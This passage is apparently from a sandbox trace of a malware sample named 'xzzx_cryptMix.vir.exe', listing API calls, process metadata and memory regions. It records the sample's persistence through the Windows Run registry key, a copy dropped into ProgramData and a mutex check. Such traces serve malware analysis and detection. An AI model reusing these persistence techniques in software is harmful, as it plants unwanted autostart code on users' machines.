GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.234] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.234] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.235] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.235] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.235] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.235] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.235] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.235] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.235] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.235] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.235] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.235] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.235] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.235] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.235] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.236] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.236] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.236] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.236] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.236] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.236] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.236] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.236] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.236] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.236] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.236] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.236] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.237] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.237] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.237] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.237] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.237] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.237] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.237] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.237] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.237] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.237] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.237] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.237] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.238] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.238] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.238] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.238] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.238] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.238] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.238] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.238] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.238] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.239] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.239] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.239] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.239] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.239] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.239] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.239] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.239] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.239] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.239] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.239] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.239] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.239] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.240] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.240] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.240] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.240] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.240] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.240] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.240] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.240] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.240] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.240] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.240] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.241] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.241] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.241] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.241] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.241] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.241] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.241] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.241] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.241] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.241] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.241] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.242] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.242] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.242] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.242] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.242] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.242] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.242] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.242] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.242] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.242] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.242] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.242] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.242] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.243] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.243] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.243] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.243] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.243] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.243] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.243] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.243] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.243] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.243] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.243] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.243] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.244] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.244] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.244] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.244] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.244] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.244] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.244] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.244] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.244] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.244] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.244] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.244] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.245] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.245] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.245] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.245] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.245] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.245] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.245] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.245] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.245] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.245] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.317] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.317] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.317] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.317] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.334] wsprintfW (in: param_1=0x180968, param_2="\"%s\"" | out: param_1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe\"") returned 61 [0092.334] GetUserNameW (in: lpBuffer=0x180558, pcbBuffer=0x180348 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x180348) returned 1 [0092.334] wsprintfW (in: param_1=0x180350, param_2="00FF%08X" | out: param_1="00FFE1010314") returned 12 [0092.334] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", phkResult=0x18034c | out: phkResult=0x18034c*=0x2b4) returned 0x0 [0092.335] RegSetValueExW (in: hKey=0x2b4, lpValueName="00FFE1010314", Reserved=0x0, dwType=0x1, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe\"", cbData=0x7a | out: lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe\"") returned 0x0 [0092.335] RegFlushKey (hKey=0x2b4) returned 0x0 [0092.853] RegCloseKey (hKey=0x2b4) returned 0x0 [0092.853] GetUserNameW (in: lpBuffer=0x180968, pcbBuffer=0x180758 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x180758) returned 1 [0092.854] wsprintfW (in: param_1=0x180760, param_2="BC%08X" | out: param_1="BCE1010314") returned 10 [0092.854] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", phkResult=0x18075c | out: phkResult=0x18075c*=0x2b4) returned 0x0 [0092.854] RegQueryValueExW (in: hKey=0x2b4, lpValueName="BCE1010314", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0092.854] Sleep (dwMilliseconds=0x1388) [0098.333] OutputDebugStringA (lpOutputString="-") [0098.333] GetUserNameW (in: lpBuffer=0x180da4, pcbBuffer=0x180b88 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x180b88) returned 1 [0098.333] wsprintfW (in: param_1=0x180b9c, param_2="%08X_offset" | out: param_1="E1010314_offset") returned 15 [0098.333] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="E1010314_offset") returned 0x2b8 [0098.334] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0x0) returned 0x102 [0098.334] CloseHandle (hObject=0x2b8) returned 1 [0098.334] ExitProcess (uExitCode=0x0) Thread: id = 208 os_tid = 0x60c Thread: id = 211 os_tid = 0x634 Thread: id = 212 os_tid = 0x640 Thread: id = 213 os_tid = 0x644 Thread: id = 219 os_tid = 0x690 Thread: id = 222 os_tid = 0x6ac Thread: id = 225 os_tid = 0x6c4 Thread: id = 228 os_tid = 0x6dc Thread: id = 231 os_tid = 0x6fc Thread: id = 234 os_tid = 0x710 Thread: id = 236 os_tid = 0x718 Thread: id = 239 os_tid = 0x728 Thread: id = 242 os_tid = 0x734 Thread: id = 245 os_tid = 0x750 Thread: id = 248 os_tid = 0x760 Thread: id = 251 os_tid = 0x774 Thread: id = 254 os_tid = 0x780 Process: id = "23" image_name = "bce1010314.exe" filename = "c:\\programdata\\bce1010314.exe" page_root = "0x6a47000" os_pid = "0x54c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\ProgramData\\BCE1010314.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e620" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2038 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2039 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2040 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2041 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2042 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 2043 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 2044 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2045 start_va = 0x55820000 end_va = 0x5585bfff entry_point = 0x55820000 region_type = mapped_file name = "bce1010314.exe" filename = "\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe") Region: id = 2046 start_va = 0x76cc0000 end_va = 0x76e68fff entry_point = 0x76cc0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2047 start_va = 0x76ea0000 end_va = 0x7701ffff entry_point = 0x76ea0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2048 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2049 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2050 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2051 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2052 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2053 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2054 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2090 start_va = 0x250000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 2091 start_va = 0x73410000 end_va = 0x73417fff entry_point = 0x734120f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2092 start_va = 0x73420000 end_va = 0x7347bfff entry_point = 0x7345f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2093 start_va = 0x73480000 end_va = 0x734befff entry_point = 0x734ade78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2121 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2122 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2123 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 2124 start_va = 0x729a0000 end_va = 0x729a7fff entry_point = 0x729a10e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 2125 start_va = 0x729b0000 end_va = 0x729ebfff entry_point = 0x729b1396 region_type = mapped_file name = "pdh.dll" filename = "\\Windows\\SysWOW64\\pdh.dll" (normalized: "c:\\windows\\syswow64\\pdh.dll") Region: id = 2126 start_va = 0x729f0000 end_va = 0x72a73fff entry_point = 0x729f19a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 2127 start_va = 0x749f0000 end_va = 0x749fbfff entry_point = 0x749f10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2128 start_va = 0x74a00000 end_va = 0x74a5ffff entry_point = 0x74a1a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2129 start_va = 0x74a60000 end_va = 0x74abffff entry_point = 0x74a7158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2130 start_va = 0x74ad0000 end_va = 0x74b5efff entry_point = 0x74ad3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2131 start_va = 0x74b90000 end_va = 0x74c0afff entry_point = 0x74b91aee region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 2132 start_va = 0x74c10000 end_va = 0x74c36fff entry_point = 0x74c158b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 2133 start_va = 0x74c40000 end_va = 0x74c85fff entry_point = 0x74c47478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2134 start_va = 0x74c90000 end_va = 0x74ca1fff entry_point = 0x74c91441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 2135 start_va = 0x74cb0000 end_va = 0x758f9fff entry_point = 0x74d31601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2136 start_va = 0x75960000 end_va = 0x759fffff entry_point = 0x759749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2137 start_va = 0x75c50000 end_va = 0x75cdffff entry_point = 0x75c66343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2138 start_va = 0x75ce0000 end_va = 0x75deffff entry_point = 0x75cf32d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2139 start_va = 0x75df0000 end_va = 0x75e46fff entry_point = 0x75e09ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2140 start_va = 0x75e50000 end_va = 0x75eecfff entry_point = 0x75e83fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2141 start_va = 0x76280000 end_va = 0x7632bfff entry_point = 0x7628a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2142 start_va = 0x76330000 end_va = 0x76348fff entry_point = 0x76334975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2143 start_va = 0x76350000 end_va = 0x764abfff entry_point = 0x7639ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2144 start_va = 0x764b0000 end_va = 0x765affff entry_point = 0x764cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2145 start_va = 0x766f0000 end_va = 0x767bbfff entry_point = 0x766f168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2146 start_va = 0x767c0000 end_va = 0x767c9fff entry_point = 0x767c36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2147 start_va = 0x767d0000 end_va = 0x768bffff entry_point = 0x767e0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2148 start_va = 0x768c0000 end_va = 0x76a5cfff entry_point = 0x768c17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 2149 start_va = 0x76aa0000 end_va = 0x76bbefff entry_point = 0x0 region_type = private name = "private_0x0000000076aa0000" filename = "" Region: id = 2150 start_va = 0x76bc0000 end_va = 0x76cb9fff entry_point = 0x0 region_type = private name = "private_0x0000000076bc0000" filename = "" Region: id = 2151 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2152 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2181 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2182 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2183 start_va = 0x220000 end_va = 0x226fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 2184 start_va = 0x230000 end_va = 0x231fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 2185 start_va = 0x2d0000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 2186 start_va = 0x470000 end_va = 0x5f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 2187 start_va = 0x620000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 2188 start_va = 0x630000 end_va = 0x7b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 2189 start_va = 0x7c0000 end_va = 0x1bbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 2190 start_va = 0x1d00000 end_va = 0x1d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 2191 start_va = 0x1e70000 end_va = 0x1e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 2192 start_va = 0x1f00000 end_va = 0x1f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 2193 start_va = 0x1f40000 end_va = 0x2332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f40000" filename = "" Region: id = 2194 start_va = 0x731b0000 end_va = 0x731c5fff entry_point = 0x731b0000 region_type = mapped_file name = "cryptsp.dll" filename = 